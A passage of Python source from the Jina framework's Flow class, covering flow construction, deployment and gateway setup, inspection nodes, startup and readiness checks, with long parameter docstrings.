:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param no_graphql_endpoint: If set, /graphql endpoint is removed from HTTP interface.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the deployment
:param runtime_backend: The parallel backend of the runtime inside the Pod
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after_address: The address of the uses-before runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
no_graphql_endpoint: Optional[bool] = False,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect deployments in the flow.
If `REMOVE` is given then all inspect deployments are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param no_graphql_endpoint: If set, /graphql endpoint is removed from HTTP interface.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._deployment_nodes = OrderedDict() # type: Dict[str, Deployment]
self._inspect_deployments = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_deployment = [
GATEWAY_NAME
] #: default first deployment is gateway, will add when build()
self._update_args(args, **kwargs)
if (
self.protocol == GatewayProtocolType.HTTP
and not self.args.no_graphql_endpoint
and not docarray_graphql_compatible()
):
self.args.no_graphql_endpoint = True
warnings.warn(
'DocArray version is incompatible with GraphQL features. '
'Automatically setting no_graphql_endpoint=True. '
f'To use GraphQL features, install docarray>={GRAPHQL_MIN_DOCARRAY_VERSION}'
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.helper import ArgNamespace
from jina.parsers.flow import set_flow_parser
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(
op_flow, deployment_name, endpoint, connect_to_last_deployment=False
) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_deployment and connect_to_last_deployment:
endpoint = [op_flow.last_deployment]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == deployment_name:
raise FlowTopologyError(
'the income/output of a deployment can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Deployment
endpoint = set(op_flow._inspect_deployments.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_deployment(self):
"""Last deployment
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_deployment[-1]
@last_deployment.setter
def last_deployment(self, name: str):
"""
Set a Deployment as the last Deployment in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Deployment
"""
if name not in self._deployment_nodes:
raise FlowMissingDeploymentError(f'{name} can not be found in this Flow')
if self._last_changed_deployment and name == self.last_deployment:
pass
else:
self._last_changed_deployment.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
deployments_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port=self.port,
deployment_role=DeploymentRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.noblock_on_start = True
args.no_graphql_endpoint = (
self.args.no_graphql_endpoint
) # also used in Flow, thus not in kwargs
args.graph_description = json.dumps(graph_description)
args.deployments_addresses = json.dumps(deployments_addresses)
self._deployment_nodes[GATEWAY_NAME] = Deployment(args, needs)
def _get_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port}']
return graph_dict
def _get_k8s_deployments_addresses(
self, k8s_namespace: str, k8s_connection_pool: bool
) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.helper import to_compatible_name
from jina.serve.networking import K8sGrpcConnectionPool
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.external:
deployment_k8s_address = f'{v.host}'
else:
deployment_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
# we only need hard coded addresses if the k8s connection pool is disabled or if this deployment is external
if not k8s_connection_pool or v.external:
graph_dict[node] = [
f'{deployment_k8s_address}:{v.head_port if v.external else K8sGrpcConnectionPool.K8S_PORT}'
]
return graph_dict if graph_dict else None
def _get_docker_compose_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.docker_compose import port
from jina.orchestrate.deployments.config.helper import to_compatible_name
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
deployment_docker_compose_address = (
f'{to_compatible_name(v.head_args.name)}:{port}'
)
graph_dict[node] = [deployment_docker_compose_address]
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same deployment
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._deployment_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_deployment = self.last_deployment
if last_deployment != 'gateway':
graph_dict[last_deployment].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all pods defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN,
*args,
**kwargs,
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Deployments so far and add a blocker to the Flow; wait until all handing pods completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_deployments(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_deployment
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
disable_reduce: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pod attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pod do not wait on the Runtime when closing
:param disable_reduce: Disable the built-in reduce mechanism, set this if the reduction is to be handled by the Executor connected to this Head
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param external: The Deployment will be considered an external Deployment that has been started independently from the Flow.This Deployment will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the deployment
:param runtime_backend: The parallel backend of the runtime inside the Pod
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Deployment has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Pods described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-before runtime
:param uses_before: The executor attached after the Pods described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_deployment
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
deployment_role: 'DeploymentRoleType' = DeploymentRoleType.DEPLOYMENT,
**kwargs,
) -> 'Flow':
"""
Add a Deployment to the current Flow object and return the new modified Flow object.
The attribute of the Deployment can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Deployment(s) that this Deployment receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param deployment_role: the role of the Deployment, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Deployment CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# deployment naming logic
deployment_name = kwargs.get('name', None)
if deployment_name in op_flow._deployment_nodes:
new_name = f'{deployment_name}{len(op_flow._deployment_nodes)}'
self.logger.debug(
f'"{deployment_name}" is used in this Flow already! renamed it to "{new_name}"'
)
deployment_name = new_name
if not deployment_name:
deployment_name = f'executor{len(op_flow._deployment_nodes)}'
if not deployment_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {deployment_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, deployment_name, needs, connect_to_last_deployment=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
# do not inherit the port argument from the flow
if key not in kwargs and key != 'port':
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Deployment
kwargs.update(
dict(
name=deployment_name,
deployment_role=deployment_role,
)
)
parser = set_deployment_parser()
if deployment_role == DeploymentRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# deployment workspace if not set then derive from flow workspace
if args.workspace:
args.workspace = os.path.abspath(args.workspace)
else:
args.workspace = self.workspace
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port = kwargs.get('port', None)
if not port:
port = helper.random_port()
args.port = port
op_flow._deployment_nodes[deployment_name] = Deployment(args, needs)
op_flow.last_deployment = deployment_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Deployment in the Flow
Internally, it adds two Deployments to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BaseDeployment(_pass) -- Flow
|
-- PUB-SUB -- InspectDeployment (Hanging)
In this way, :class:`InspectDeployment` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Deployment
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_deployment = self.last_deployment
op_flow = self.add(
name=name,
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT,
*args,
**kwargs,
)
# now remove uses and add an auxiliary Deployment
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_deployment,
deployment_role=DeploymentRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_deployment by the auxiliary Deployment
op_flow._inspect_deployments[_last_deployment] = op_flow.last_deployment
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_deployment: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Deployments output into one Deployment. When the Flow has no inspect Deployment then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Deployment
:param include_last_deployment: if to include the last modified Deployment in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [
k
for k, v in self._deployment_nodes.items()
if v.role == DeploymentRoleType.INSPECT
]
if needs:
if include_last_deployment:
needs.append(self.last_deployment)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_deployment = self._deployment_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_deployment.head_host,
'port': gateway_deployment.head_port,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._deployment_nodes:
op_flow._add_gateway(
needs={op_flow.last_deployment},
graph_description=op_flow._get_graph_representation(),
deployments_addresses=op_flow._get_deployments_addresses(),
)
removed_deployments = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_deployment_nodes = OrderedDict()
for k, v in op_flow._deployment_nodes.items():
if not v.role.is_inspect:
filtered_deployment_nodes[k] = v
else:
removed_deployments.append(v.name)
op_flow._deployment_nodes = filtered_deployment_nodes
reverse_inspect_map = {
v: k for k, v in op_flow._inspect_deployments.items()
}
while (
len(op_flow._last_changed_deployment) > 0
and len(removed_deployments) > 0
and op_flow.last_deployment in removed_deployments
):
op_flow._last_changed_deployment.pop()
for end, deployment in op_flow._deployment_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Deployment
# but not those inspect related node
if op_flow.args.inspect.is_keep:
deployment.needs = set(
ep
if deployment.role.is_inspect
else op_flow._inspect_deployments.get(ep, ep)
for ep in deployment.needs
)
else:
deployment.needs = set(
reverse_inspect_map.get(ep, ep) for ep in deployment.needs
)
hanging_deployments = _hanging_deployments(op_flow)
if hanging_deployments:
op_flow.logger.warning(
f'{hanging_deployments} are hanging in this flow with no deployment receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_deployments) > 0:
# very dirty
op_flow._deployment_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._deployment_nodes[
GATEWAY_NAME
].args.deployments_addresses = json.dumps(
op_flow._get_deployments_addresses()
)
op_flow._deployment_nodes[GATEWAY_NAME].update_pod_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._deployment_nodes:
self._deployment_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Deployments in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.orchestrate.pods.Pod`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Deployment get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_deployment_name, _deployment):
try:
if not _deployment.external:
results[_deployment_name] = 'pending'
_deployment.wait_start_success()
results[_deployment_name] = 'done'
except Exception as ex:
results[_deployment_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all deployments wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_deployments = [k for k, v in results.items() if v != 'done']
if error_deployments:
self.logger.error(
f'Flow is aborted due to {error_deployments} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_deployments} Deployments (i.e. {self.num_pods} Pods) are running in this Flow'
)
@property
def num_deployments(self) -> int:
"""Get the number of Deployments in this Flow
.. # noqa: DAR201"""
return len(self._deployment_nodes)
@property
def num_pods(self) -> int:
"""Get the number of pods (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_pods for v in self._deployment_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._deployment_nodes == b._deployment_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
deployment_nodes = []
# plot subgraphs
for node, v in self._deployment_nodes.items():
deployment_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._deployment_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._deployment_nodes[need].role
_e_role = self._deployment_nodes[node].role
if self._deployment_nodes[need].external:
_s_role = 'EXTERNAL'
if self._deployment_nodes[node].external:
